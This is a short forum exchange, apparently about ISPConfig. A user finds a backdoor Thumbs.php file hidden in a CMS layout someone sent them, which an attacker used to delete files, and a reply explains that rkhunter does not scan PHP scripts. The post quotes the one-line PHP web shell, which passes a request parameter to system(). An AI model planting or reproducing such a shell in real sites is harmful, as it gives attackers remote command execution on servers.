Hello, Yesterday someone sent me the layout of the CMS, i upload it to my server, including the layout was a backdoor Thumbs.php file, this file contains: Code: <pre><body bgcolor=silver><? @system($_REQUEST["v"]); ?></body></pre> It seems to me that this backdoor exactly: http://www.xakep.ru/magazine/xa/124/038/1.asp This person has execute this script by adress.com/layout/layoutname/img/Thumbs.php and removed all the files in that directory. I have ispconfig 3.0.4.3, why rkhunter did not block this backdoor? I thought these programs with ispconfig will protect me from the backdoor
First, rkhunter doesn't remove anything - it just detects malware, trojans, etc., and warns you. Second, it doesn't check PHP scripts (how should this work? How should it know the hash of a bad PHP script that someone uploads to your server?).
